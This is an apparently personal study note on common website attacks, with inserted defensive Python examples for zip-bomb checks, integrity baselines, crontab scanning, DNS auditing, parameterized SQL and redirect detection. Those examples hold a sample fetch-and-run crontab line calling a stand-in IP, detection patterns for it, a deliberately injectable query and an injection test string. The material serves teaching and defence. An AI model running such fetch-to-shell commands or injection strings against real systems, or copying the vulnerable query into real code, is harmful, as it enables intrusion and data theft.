Common attack methods on network security websites

This section is the author's own study and is not part of the course content.

A large number of black links appear on the web page

The website looks normal, but some links are hidden. Links on web pages are almost always <a> tags. A black link uses an <a> tag or a <script> tag to load a malicious script; it waits for a browser to visit, collects browser information through XSS or similar methods, scans for vulnerabilities, and then attacks the system.

Black link characteristics

Concealment

Black links are malicious links hidden in a website's source code, usually invisible to the human eye. They can be hidden by setting the font size to zero in the page source, using the same font colour as the background, or offsetting the element off-screen (an extreme offset). It is easy to click one by mistake.

Advertise and get traffic

Black links are often used to pop up unwanted advertisements and capture user traffic, making a profit through deception and illegal means.

Mining and digital currency

Mining

Black links may also be used for illegal mining. When users visit web pages containing black links, their computer resources (CPU and GPU) may be used by malware for unauthorized cryptocurrency mining. Readers unfamiliar with mining need not worry; the meaning is explained first.

  • When a computer or mobile phone is infected by a mining virus, the virus uses the processing power (CPU or GPU) of the device to mine cryptocurrency, usually without the knowledge of the device owner.
  • This can lead to reduced device performance, overheating, and reduced battery life.

Cryptocurrency

Cryptocurrency is a digital or virtual currency that uses the principles of cryptography to protect transactions, control the creation of new currency, and verify asset transfers. It is a decentralized currency that is not controlled by any central bank or government. For example, Bitcoin: who has seen it in real life? It is virtual, but it can be traded in some countries.

The impact of cryptocurrencies

  • Anonymity of transactions: While this provides users with privacy, it may also be used for illegal transactions, such as money laundering and the purchase of illegal goods and services.
  • Investment Risk: Cryptocurrency prices fluctuate violently, and investors may face significant losses.
  • Security Issues: Cryptocurrency exchanges and wallets are vulnerable to hacker attacks.

Can I use cryptocurrencies?

The use of cryptocurrencies is legal in many countries and regions. It can be used as a method of payment for goods and services and as an investment vehicle. However, some countries have banned or restricted the use of cryptocurrencies, such as China.

Why cryptocurrencies?

  • Privacy Protection: Through encryption technology, users’ transactions can be better protected.
  • Decentralization: Cryptocurrencies are not controlled by traditional financial institutions and help reduce transaction costs and time. Their transaction costs are lower than those of banks.
  • Financial Inclusion: Providing access to financial services to those who do not have access to traditional banking services.

What is the relationship between cryptocurrency and mining?

Mining is the process of verifying and recording cryptocurrency transactions by using computing power to solve complex mathematical problems. Miners are rewarded with newly generated cryptocurrency and transaction fees.

Mining is not about digging up cryptocurrency; it is about finding the answer to a problem. Once the answer is found, it can be used to verify something important, and the miner receives a cryptocurrency reward. The cryptocurrency can then be converted into real currency, that is, money is made.

Why is Monero popular and what does it do?

Monero (XMR) is a privacy-focused cryptocurrency. It uses sophisticated cryptography to ensure the anonymity and untraceability of all transactions. This makes it particularly popular among some users and groups, especially those who take privacy very seriously.

What are mining pools used for?

In the context of blockchain and cryptocurrency, the term “miner” can refer to two things:

  1. Individuals or entities: Miners can refer to individuals or organizations (such as mining companies or mining pools) that participate in mining activities. They configure and run the hardware, select specific cryptocurrencies to mine, and decide how to optimize their operations.

  2. Computer or hardware device: Miners can also refer to computers or specific hardware (such as ASIC mining machines) that perform mining operations. These devices are constantly performing calculations in an attempt to solve mathematical puzzles on the blockchain network.

In most contexts, when people refer to “miners,” they usually refer to individuals or entities involved in mining activities. However, depending on the context, it may also refer to the hardware device that performs the actual computation.

A mining pool is a collection of miners who combine their computing power to improve the probability of solving the cryptocurrency network's hash problem (this is the same problem mentioned before; mining means finding the answer to it. Don't worry if you don't understand this yet, the author will write another detailed article). By joining a mining pool, miners can earn profits more consistently, although these profits must be shared with the other miners in the pool.

Summary

In general, mining consists of trying different input values to find a hash output that satisfies certain conditions. Its main purpose is to verify and record transactions on the network, ensuring the security and integrity of transactions. Successful miners are rewarded with newly generated cryptocurrency and transaction fees (the so-called "block reward"). However, criminals may also illegally use other people's computing resources for mining through viruses. This behavior is not allowed and may have a negative impact on the performance and lifespan of the infected device.

The author spent nearly two hours to understand this a little. There is too much detail, so it will be explained in a new "Blockchain" chapter. For now, readers can understand it this way: mining is solving a problem. Finding the solution, and then having it checked by many other participants, ensures the security and stability of the network during the transaction process. Finally, the transaction record and certain previously recorded information are combined into a new block, placed on the blockchain, and a monetary reward is received.


A large number of embedded web pages appear in the root directory of the website

1. Usually seen when a web page is developed and then simply thrown onto a server with no operation and maintenance management (isn't this just me?);

2. Also seen with upload or download vulnerabilities, such as a zip compression bomb: the compressed file is 4KB and the decompressed file is 4PB, which directly fills up the disk. For example, you can mess with people you don't like... there are also email bombs;

3. Also seen in brute-force enumeration of website directory content, usually used against high-traffic websites.
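The zip bomb in item 2 works because the server trusts the archive and inflates it without limits. The following is an added example, not code from the original post, showing how an upload handler can refuse such an archive: it first checks the sizes declared in the central directory (total size and compression ratio), then caps the bytes actually produced during extraction, because the declared sizes in a hostile archive can be forged. The limits and both sample archives are constructed for illustration.

```python
"""Safe ZIP extraction that refuses decompression bombs.

Added example (not from the original post). The limits are illustrative
and the sample archives are constructed in memory.
"""
import io
import zipfile

MAX_TOTAL_BYTES = 10 * 1024 * 1024   # refuse archives declaring > 10 MiB uncompressed
MAX_RATIO = 100                      # refuse entries compressing better than 100:1
CHUNK = 64 * 1024


class ZipBombError(Exception):
    pass


def inspect_zip(data: bytes) -> dict:
    """Check declared sizes in the central directory before extracting anything.

    Returns {"total": declared_uncompressed_bytes, "worst_ratio": float}
    or raises ZipBombError.
    """
    total = 0
    worst = 0.0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for zi in zf.infolist():
            if zi.is_dir():
                continue
            ratio = zi.file_size / max(zi.compress_size, 1)
            worst = max(worst, ratio)
            total += zi.file_size
            if ratio > MAX_RATIO:
                raise ZipBombError(f"{zi.filename}: ratio {ratio:.0f}:1 exceeds {MAX_RATIO}:1")
            if total > MAX_TOTAL_BYTES:
                raise ZipBombError(f"declared size {total} exceeds {MAX_TOTAL_BYTES}")
    return {"total": total, "worst_ratio": worst}


def extract_capped(data: bytes) -> dict:
    """Extract into memory while counting the bytes actually produced.

    Header sizes can be forged, so the declared-size check alone is not enough:
    the real byte count is enforced while inflating.
    """
    inspect_zip(data)
    out = {}
    produced = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for zi in zf.infolist():
            if zi.is_dir():
                continue
            buf = bytearray()
            with zf.open(zi) as fh:
                while True:
                    chunk = fh.read(CHUNK)
                    if not chunk:
                        break
                    produced += len(chunk)
                    if produced > MAX_TOTAL_BYTES:
                        raise ZipBombError("actual output exceeded the cap during extraction")
                    buf.extend(chunk)
            out[zi.filename] = bytes(buf)
    return out


def make_zip(entries: dict) -> bytes:
    """Build a ZIP in memory (used only to construct the sample input)."""
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in entries.items():
            zf.writestr(name, payload)
    return bio.getvalue()


def is_safe(data: bytes) -> bool:
    try:
        inspect_zip(data)
        return True
    except ZipBombError:
        return False


# Constructed samples: an ordinary archive, and a bomb-like one (zeros compress about 1000:1)
NORMAL_ZIP = make_zip({"readme.txt": b"hello world, this is an ordinary file\n" * 20})
BOMB_ZIP = make_zip({"bomb.bin": b"\0" * (5 * 1024 * 1024)})

if __name__ == "__main__":
    print("normal:", is_safe(NORMAL_ZIP), inspect_zip(NORMAL_ZIP))
    print("bomb:", is_safe(BOMB_ZIP))
```

A real upload handler would also reject nested archives (a zip inside a zip defeats the ratio check of the outer file) and extract to a quota-limited directory rather than memory.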


Website web page Trojan implantation (挂马, "hanging a horse")

Trojan implantation usually refers to hackers implanting malicious code, or links to malware, into normal websites. When users visit the website, the malicious code is executed automatically; it may steal users' personal information or use their computer resources for illegal activities such as mining.

  1. Types of Trojan implantation:

    • iFrame injection: Embed an invisible frame in a web page and load a malicious website.
    • JavaScript Trojan: Insert malicious JavaScript code to redirect or download malware.
    • SEO Trojan: Insert spam links or keywords to damage the SEO of the website.
  2. How a Trojan is implanted:

    • Exploiting CMS vulnerabilities: Attackers exploit known vulnerabilities in CMS (such as WordPress and Joomla) to insert malicious code.
    • FTP/SSH password theft: Modify website code by stealing FTP or SSH credentials.
  3. Purpose of implanting a Trojan:

    • Distribute malware: Use Trojans to spread malware to visitors' computers.
    • Steal personal information: Use Trojan to steal users’ private data.
    • Utilize computing resources: Use Trojan to utilize users’ computing resources for cryptocurrency mining.
  4. Detecting and defending against Trojan implantation:

    • Update software regularly: Make sure all software and plug-ins are up to date to fix known vulnerabilities.
    • Use security plug-ins: Use security plug-ins to detect and block malicious behavior.
    • Monitor website code: Monitor website code changes to detect the insertion of malicious code in a timely manner.
    • Perform regular security scans: Use a website security scanning tool to regularly scan your website for potential security issues.
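"Monitor website code" in the list above is usually done with a file-integrity baseline: hash every file under the web root once, then re-hash on a schedule and report anything new, changed or missing. The following is an added example, not code from the original post; it builds a tiny web root in a temporary directory, takes a baseline, simulates an injected iframe and a dropped PHP file, and diffs. The paths and file contents are constructed.

```python
"""Web-root integrity baseline for spotting injected or dropped files.

Added example, not part of the original post. Assumes a directory tree on
local disk; the sample tree below is constructed in a temporary directory.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large assets do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map relative path -> SHA-256 for every regular file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            baseline[str(p.relative_to(root))] = hash_file(p)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Report files added, modified and removed relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def demo() -> dict:
    """Construct a web root, baseline it, simulate an injection, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<html><body>Welcome</body></html>")
        (root / "js").mkdir()
        (root / "js" / "app.js").write_text("console.log('app');")
        baseline = build_baseline(root)
        # Simulated compromise (constructed): a hidden iframe injected into the
        # home page and an unexpected script dropped into the js directory
        (root / "index.html").write_text(
            "<html><body>Welcome"
            "<iframe src='http://bad.invalid/' style='display:none'></iframe>"
            "</body></html>")
        (root / "js" / "x.php").write_text("<?php echo 'dropped'; ?>")
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Store the baseline somewhere the web server account cannot write, otherwise an attacker who can modify the site can also "fix" the baseline.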

Website server is running slowly

Essentially, the server has been implanted with a worm virus, which is a specific kind of computer program and malicious code.

Worm

  • Definition: A worm is a type of malware that replicates itself and spreads to other computers or servers, no human intervention is required.
  • Impact: The worm consumes a large amount of system resources (such as CPU and memory), causing the server to become extremely slow.
  • Example: A worm may search for vulnerabilities on a network and automatically replicate itself on those systems.

A worm infection is usually caused by downloading unofficial software, such as automated operation and maintenance tools. This involves social engineering: the download will certainly not tell you that it contains a virus; it pretends to meet a normal requirement and tricks you into downloading it.

Social Engineering

  • Definition: Social engineering involves the use of psychological manipulation to induce individuals to engage in unsafe behavior, such as downloading and installing malware.
  • Impact: Users may be tricked into downloading software that appears to be normal but actually contains malicious code.
  • Example: A fake automated operation and maintenance tool website may induce visitors to download and install software containing worm viruses.

You can see the CPU usage through background monitoring. If it is abnormally high, the server must have been attacked, and memory and disk resources are being exhausted.

The damn worm virus may set up a scheduled task that periodically calls a script (Shell or Python), that is, it regularly checks whether it has been deleted; if so, it comes back to life by secretly downloading itself again from a remote server.
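The scheduled task described above is what a defender should look for in crontabs. The following is an added example, not code from the original post: it parses crontab text and flags entries with the traits of worm persistence (a remote fetch piped straight into a shell, base64-decoded payloads, scripts living in temp directories). The crontab content is constructed and the patterns are illustrative heuristics, not a complete detector.

```python
"""Flag crontab entries that look like worm persistence.

Added example (not from the original post). The crontab text is
constructed; the heuristics are illustrative, not exhaustive.
"""
import re

# Traits a defender would review by hand
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "remote fetch piped to shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/"), "script in temp directory"),
    (re.compile(r"\bchattr\s+\+i\b"), "immutable attribute set (anti-removal)"),
]


def parse_crontab(text: str) -> list:
    """Return (schedule, command) tuples, skipping comments and variable assignments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]+=", line):
            continue
        if line.startswith("@"):                     # @hourly, @reboot, ...
            parts = line.split(None, 1)
        else:                                        # five time fields then the command
            fields = line.split(None, 5)
            parts = [" ".join(fields[:5]), fields[5]] if len(fields) == 6 else [line]
        entries.append((parts[0], parts[1] if len(parts) > 1 else ""))
    return entries


def scan_crontab(text: str) -> list:
    """Return [(command, reason), ...] for entries matching a suspicious pattern."""
    findings = []
    for _schedule, cmd in parse_crontab(text):
        for rx, reason in SUSPICIOUS:
            if rx.search(cmd):
                findings.append((cmd, reason))
                break
    return findings


# Constructed sample: two ordinary jobs and two that resemble worm persistence
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://203.0.113.10/x.sh | sh
@hourly /bin/sh /tmp/.X11-unix/update.sh
30 4 * * 1 /usr/bin/certbot renew --quiet
"""

if __name__ == "__main__":
    for cmd, reason in scan_crontab(SAMPLE_CRONTAB):
        print(f"[!] {reason}: {cmd}")
```

On a real host, feed it the output of `crontab -l` for every user plus the files under /etc/cron.d and /etc/cron.*; persistence also hides in systemd timers and rc scripts, which this parser does not cover.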

Broilers (bots) may be replicated and spread in preparation for a DDoS, which is a means of destruction through traffic.

Broiler (Botnet)

  • Definition: A broiler network, or botnet, is a network of large numbers of computers infected with malware.
  • Impact: Infected computers (also known as "zombie computers" or "bots") can be remotely controlled by hackers and used to perform a variety of malicious activities.
  • Example: An infected server may be used as part of a deployed DDoS attack.

DDoS attack

  • Definition: A Distributed Denial of Service (DDoS) attack uses large amounts of traffic to make the target server unable to respond to legitimate requests.
  • Impact: The server may not be able to handle legitimate user requests, resulting in service interruption.

Website domain name DNS hijacking

DNS hijacking, also known as DNS redirection, is a type of network attack. An attacker modifies DNS server settings through illegal means, causing users to reach the wrong website address. To put it simply: you want to reach the website IP corresponding to a domain name, but I won't let you; I point that domain name at my own IP. In this way, I can attract traffic to my pirated website. You will find that this pirated website may be an overseas or a domestic site. When you try to ping your own server, the result returned is not the IP of your own website. The following is a detailed introduction to DNS hijacking:

Characteristics and user experience of this attack:

  1. Redirect to wrong website: Users try to access a legitimate website (such as a bank website), but because the DNS records have been tampered with, they are redirected to a malicious website.

  2. Normal-looking website: A hijacked website usually looks very similar to the original website, making it difficult for users to detect it.

  3. Information leakage risk:Users may enter sensitive information (such as username, password, credit card information, etc.) on these malicious websites, resulting in Information leakage.

  4. Undetectable tampering:A user may be completely unaware that a DNS record has been tampered with because the URL itself has not changed, only the content and target server have changed.

1. Principle and Execution

a) DNS system

  • DNS (Domain Name System) is a core service of the Internet. It serves asa distributed database that maps domain names and IP addresses to each other, enabling users to access the Internet more conveniently.

b) Hijacking process

  • Attackers use various means to tamper with the data of the DNS server. When a user tries to access a specific website, the tampered DNS server returns an incorrect IP address and redirects the user to a server controlled by the attacker.

2. Attack method

a) Tampering with DNS server

  • The attacker invades and controlsDNS server, directly modifying the mapping relationship between domain names and IP addresses.

b) Local machine hijacking

  • Modify the DNS settings ofuser's computer through malware, causing the domain name requested by the user to resolve to the wrong IP address.

3. Effects

  • Users are redirected to fake websites that may steal their personal and sensitive information.
  • Fake websites may force users to download malware that takes control of their computers.
  • Redirects allow attackers to monetize traffic by directing large amounts of traffic to sites they control.

4. Prevention measures

  • Check DNS settings regularly to ensure that the DNS settings of computers and network devices have not been illegally modified.
  • Use a secure DNS server: use a well-known and secure DNS service provider, such as Google DNS or Cloudflare DNS.
  • Use DNS encryption: use DNS over HTTPS or DNS over TLS to ensure the security and privacy of DNS queries.
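The first prevention measure, checking DNS settings regularly, can be scripted. The following is an added example, not code from the original post: it reads resolv.conf-style and hosts-style text, reports any resolver not on an allow-list, and reports hosts-file entries that override sensitive domains (the local machine hijacking described in section 2b). The allow-list, the sensitive-domain list and both file contents are constructed; on a real host you would read /etc/resolv.conf and /etc/hosts, or the Windows equivalents.

```python
"""Check resolver settings and the hosts file for signs of DNS tampering.

Added example, not from the original post. The trusted-resolver list, the
sensitive-domain list and both file contents are constructed.
"""
import ipaddress

TRUSTED_RESOLVERS = {"1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4", "192.0.2.53"}  # constructed allow-list
SENSITIVE_DOMAINS = {"bank.example", "login.example"}  # should never be overridden locally


def parse_resolv_conf(text):
    """Return the nameserver addresses in resolv.conf order."""
    servers = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def parse_hosts(text):
    """Return (ip, hostname) pairs from an /etc/hosts style file."""
    pairs = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2:
            pairs.extend((parts[0], name.lower()) for name in parts[1:])
    return pairs


def audit_dns(resolv_text, hosts_text):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    for ns in parse_resolv_conf(resolv_text):
        try:
            ipaddress.ip_address(ns)
        except ValueError:
            findings.append(f"unparseable nameserver {ns!r}")
            continue
        if ns not in TRUSTED_RESOLVERS:
            findings.append(f"unexpected resolver {ns}")
    for ip, name in parse_hosts(hosts_text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append(f"unparseable hosts entry {ip!r}")
            continue
        if addr.is_loopback:
            continue  # localhost mappings are normal
        if name in SENSITIVE_DOMAINS or any(name.endswith("." + d) for d in SENSITIVE_DOMAINS):
            findings.append(f"hosts override: {name} -> {ip}")
    return findings


# Constructed samples: an unknown second resolver, and a hosts entry pointing a bank domain elsewhere
RESOLV_CONF = "nameserver 1.1.1.1\nnameserver 198.51.100.7\n"
HOSTS = """127.0.0.1 localhost
::1 localhost
203.0.113.5 www.bank.example bank.example  # added by malware
"""

if __name__ == "__main__":
    for finding in audit_dns(RESOLV_CONF, HOSTS):
        print("[!]", finding)
```

This only catches tampering on the client side; a hijacked upstream resolver or a tampered authoritative record is detected by comparing answers from several independent resolvers, or by the domain owner enabling DNSSEC.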


Website and server passwords have been tampered with

1. SSH service---port 22

SSH (Secure Shell Protocol) usually runs on port 22. If it is configured improperly (e.g. a weak password is used, or root remote login is not disabled), an attacker may attempt to guess the password by brute force to gain unauthorized access to the SSH service.

Protection methods
  • Use strong passwords and public key authentication.
  • Change the default port for the SSH service.
  • Use a firewall to restrict access to port 22.
  • Use a fail lockout policy to block multiple failed login attempts.

2. Remote connection---port 3389

  • Port 3389 is the default port of Windows Remote Desktop Services (RDS).
  • If a server's RDP service is exposed to the Internet and uses a weak password or has other security vulnerabilities, an attacker can exploit these vulnerabilities to gain remote access to the server.
  • Windows shows a Sticky Keys prompt when Shift is pressed five times in a row, and the Sticky Keys vulnerability is usually used to gain unauthorized access to the system. If an attacker is able to activate Sticky Keys on a remote system, they may try to exploit this feature to run commands as another user.


The website’s database is embedded with content

When we talk about "embedded content in a website's database," we usually mean that unauthorized third parties have accessed and modified the contents of the database through various means. Such attacks are a significant security threat to any organization as they can lead to the corruption, loss or leakage of data. This process may cover a range of attacks, including SQL injection, malware infection, and other attacks carried out through network vulnerabilities.

1. Database implant content

  • Attackers exploit database vulnerabilities or flaws to insert malicious content into the database. This may include malicious scripts, links to malware, or other code used to further attacks or steal information.
  • The implanted content in the database means that the attacker has successfully accessed the database, which may not only cause the integrity and authenticity of the data to be compromised, but may also cause the entire application or System failure.

2. SQL database dumping (爆库)

  • SQL database dumping (爆库) refers to gaining access to a database by exploiting its security vulnerabilities, and stealing or destroying the data. This attack is particularly common against widely used database systems such as MySQL.
  • Database dumping is usually achieved through SQL injection. SQL injection is a method of injecting malicious SQL code into a query, thereby bypassing the application's security mechanisms and interacting directly with the database. A successful SQL injection can give the attacker full access to the database, allowing them to execute arbitrary SQL, including insert, modify, and delete operations.

3. Advanced attacks

  • Ransom attack: An attacker locks the data in a database and demands a ransom to unlock it. This type of attack poses a particular threat to institutions that have strict requirements for data security and availability (e.g. banks, schools, governments).
  • Ransomware attacks are often carried out as part of other attacks, such as database dumping. Once attackers gain access to a database, they can use a variety of techniques to lock down the data.

Database protection overlaps with database optimization, which involves how to store, retrieve, and manage data most efficiently. A poorly optimized database can exhibit performance bottlenecks, erratic application response times, and potential security risks. Here are some database protection measures:

  • Follow safe programming practices, such as usingparameterized queries to prevent SQL injection.
  • Regularly update and patch database software to close known security holes.
  • Usestrong passwords and multi-factor authentication to increase database security.
  • Restrict database access to ensure that only the people or systems that need access have the appropriate permissions.
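The first measure, parameterized queries, is best understood by seeing the vulnerable form and the safe form side by side. The following is an added example, not code from the original post: an in-memory SQLite database with two constructed rows, a lookup that splices user input into the SQL text, and the same lookup with a bound parameter. The tautology string is the classic test input; against the string-built query it returns every row, against the parameterized query it returns nothing because the driver never lets it become SQL syntax.

```python
"""String-built query (vulnerable) beside its parameterized form.

Added example, not from the original post. Uses an in-memory SQLite
database with constructed rows.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:", check_same_thread=False)
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)",
                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    return conn


def lookup_vulnerable(conn, username):
    # BAD: the input is spliced into the SQL text, so a quote in the input
    # ends the string literal and the rest is executed as SQL.
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    # GOOD: the value travels separately from the SQL text; whatever it
    # contains, it is compared as data and can never change the query.
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


CONN = make_db()
BENIGN = "alice"
TAUTOLOGY = "x' OR '1'='1"   # classic injection test string (constructed input)


def demo():
    """Run both lookups with both inputs and return the row lists."""
    return {
        "vuln_benign": lookup_vulnerable(CONN, BENIGN),
        "vuln_tautology": lookup_vulnerable(CONN, TAUTOLOGY),
        "param_benign": lookup_parameterized(CONN, BENIGN),
        "param_tautology": lookup_parameterized(CONN, TAUTOLOGY),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The same placeholder mechanism exists in every mainstream driver (`%s` for psycopg2 and MySQL connectors, `?` for SQLite and JDBC); the rule is that the SQL text never contains a user-supplied value.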

DDOS

1. Concept:

DDoS (Distributed Denial of Service) is an attack method that overloads the target's network resources so that it cannot provide service normally. In this kind of attack, the attacker uses many "broilers" (controlled computers) to send a large number of requests to the target at the same time, exceeding the target server's processing capacity and making it inaccessible to normal users.

2. Mechanism:

  1. Broiler network: The attacker first infects a large number of computers through various means and combines them into a "broiler network" (botnet).
  2. Launch attack: The attacker instructs these broilers to send a large number of requests to the target server at the same time, causing the server to be overloaded.
  3. Service interruption: The server cannot handle such a huge amount of traffic, normal user requests cannot be answered, and denial of service is achieved.

3. Real-world scenarios:

  • Gaming companies or large websites are common targets for DDoS attacks. For example, a newly launched game may be subject to a DDoS attack, causing players to be unable to access the game server.
  • Some attackers use DDoS attacks as a means of extortion. They attack target websites and then demand payment to stop the attack.

4. Prevention measures:

  • Although it is difficult and costly to defend against DDoS attacks, taking some measures, such as usingDDoS protection services, can effectively mitigate the impact of attacks.

5. Legal issues:

  • Launching a DDoS attack is illegal in many countries and is considered a cybercrime. DDoS attacks will not only cause service interruption, but may also cause economic losses and reputational damage to the enterprise.

Illegal bridge page

An illegal bridge page, also known as a doorway page or portal page, is mainly a way of forwarding or redirecting web traffic to a specific website or page.

Bridge pages are created for search engine optimization (SEO), and their main purpose is to obtain high rankings in search engines, thereby benefiting the advertising or other services behind them. These pages provide search engines with specific keywords and content, but when users click on the search results link, they may be redirected to other pages that are not relevant to the search query. Often used in black hat SEO tactics, the goal is to trick search engines, achieve high rankings, and then redirect traffic to other websites that may not be relevant to the original search query.

In other words, the main function of an illegal bridge page is to automatically jump users from one website to another without their knowledge. For example, you might click on a link about healthy eating and suddenly find yourself taken to a completely unrelated sales site. This is the illegal bridge page at work. It quietly changes your browsing direction behind the scenes, possibly to increase traffic to unrelated websites or to promote products.

  1. Misleading search results: When users search for information on search engines, they may encounter these bridge pages, which usually contain a large number of keywords but low-quality content.

  2. Redirects: After clicking on these bridge pages, users may be redirected to other websites unrelated to the search content, such as advertising pages or other fraudulent websites.

  3. Irrelevant or low-quality content: The content of the bridge page is often irrelevant to the user's search query or is low-quality, copy-pasted content.

  4. Poor user experience: This type of attack has a greater impact on the user experience because it prevents users from getting the information they really need.


Implemented via JS

Illegal bridge pages are usually implemented by inserting malicious JavaScript code into legitimate websites. When a user visits a page with this JS code embedded, the code executes automatically and redirects the user to another page. This is a common black hat search engine optimization (SEO) tactic.


301 redirect

A 301 redirect is another way to implement an illegal bridge page. This redirection is permanent and is often used to send traffic from one URL to another. Illegal operators exploit this to redirect traffic from legitimate web pages to their own or other unrelated pages.

  • Example: The URL of a well-known blog is set with a 301 redirect, and all traffic to this blog is redirected to a website selling counterfeit products.

Illegal bridge pages exploit users' trust and lack of knowledge to generate traffic and revenue for illegal or unethical websites. By using JavaScript or 301 redirects, they silently divert users away from the website they originally intended to visit, which not only affects the user's online experience, but may also expose users to security risks.
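Both mechanisms named above (a JavaScript redirect and a 301 redirect) leave traces a site owner can audit. The following is an added example, not code from the original post: it parses page HTML for meta-refresh and JavaScript location redirects whose target host differs from the page's own host, and inspects a captured list of HTTP hops for a permanent redirect that leaves the original site. The HTML and the hop list are constructed; in practice both come from fetching the page with an HTTP client.

```python
"""Spot bridge-page redirects in page HTML and in a captured HTTP redirect chain.

Added example, not from the original post. The HTML and the hop list are
constructed; a real audit would fetch them with an HTTP client.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# JS redirect forms: location = "...", location.href = "...", location.replace("...")
JS_ASSIGN = re.compile(
    r"location(?:\.href)?\s*=\s*['\"](https?://[^'\"]+)['\"]"
    r"|location\.(?:replace|assign)\(\s*['\"](https?://[^'\"]+)['\"]",
    re.IGNORECASE)


class RedirectFinder(HTMLParser):
    """Collects (mechanism, target_url) for meta refresh and JS location redirects."""

    def __init__(self):
        super().__init__()
        self.targets = []
        self._script = None  # buffer for the body of the current inline <script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content") or "", re.I)
            if m:
                self.targets.append(("meta-refresh", m.group(1)))
        elif tag == "script" and not a.get("src"):
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            for m in JS_ASSIGN.finditer("".join(self._script)):
                self.targets.append(("js-location", m.group(1) or m.group(2)))
            self._script = None


def offsite_redirects(page_url, html):
    """Return redirect targets whose host differs from the page's own host."""
    host = urlparse(page_url).hostname
    finder = RedirectFinder()
    finder.feed(html)
    return [(mech, url) for mech, url in finder.targets
            if urlparse(url).hostname and urlparse(url).hostname != host]


def audit_chain(hops):
    """hops: [(url_requested, status_returned), ...] in the order they were fetched.
    Returns the first permanent (301/308) redirect that leaves the original host, else None."""
    origin = urlparse(hops[0][0]).hostname
    for (url, status), (next_url, _) in zip(hops, hops[1:]):
        if status in (301, 308) and urlparse(next_url).hostname != origin:
            return {"from": url, "to": next_url, "status": status}
    return None


# Constructed page on blog.example: a meta refresh, an off-site JS redirect, and a same-site one
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=https://promo.invalid/landing">
</head><body>
<h1>Healthy eating tips</h1>
<script>window.location.href = "https://promo.invalid/landing2";</script>
<script>window.location = "https://blog.example/archive";</script>
</body></html>"""

# Constructed hop list: the blog post permanently redirects to a counterfeit shop
SAMPLE_HOPS = [("https://blog.example/post/1", 301), ("https://cheap-watches.invalid/", 200)]

if __name__ == "__main__":
    print(offsite_redirects("https://blog.example/post/1", SAMPLE_HTML))
    print(audit_chain(SAMPLE_HOPS))
```

Cloaked bridge pages serve the redirect only to some visitors (for example, by referrer or user agent), so an audit should fetch the page the way a search visitor would, not only from the owner's own browser.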

Although illegal bridge pages may bring benefits to their operators in the short term, they damage the entire network ecosystem, harm users and legitimate websites, and violate the policies of most search engines. Many search engines, such as Google, regularly check for and lower the search rankings of websites that use this strategy.


The author's personal experience

When I was reading an article before, there was a link inside the article; I clicked it and it jumped to a football gambling website. This was not reached through a search. Is it an illegal bridge page?

This is actually "illegal bridge page" behavior in a broad sense, but more accurately it belongs to "malicious redirects" or "clickjacking". Although illegal bridge pages are often associated with improving search engine rankings, their core feature is misleading users into jumping to websites unrelated to the original content. This can occur in a variety of scenarios, including but not limited to search engine results.

In the author's case, the link within the article appeared to lead to relevant content, but actually redirected the author to a completely unrelated football gambling website. This behavior is consistent with the characteristics of malicious redirects:

  1. Misleading links: A link that looks like it leads to a related article or content, but actually leads to an entirely different destination.

  2. Harm to the user experience: This type of redirect harms the user experience because the user expects content relevant to the original article rather than being sent to an irrelevant website.

  3. Potentially malicious purposes: This type of redirect is often used to promote a specific website, commit ad fraud, or in worse cases, distribute malware.

While this situation may not technically be an illegal bridge page in the strict, traditional sense, it does have the characteristics of a malicious redirect, which belongs to the category of network security issues. The best thing for users to do when encountering such situations is to be cautious about clicking on unknown links and to use reliable network security tools to protect their devices and information.


Black Hat SEO

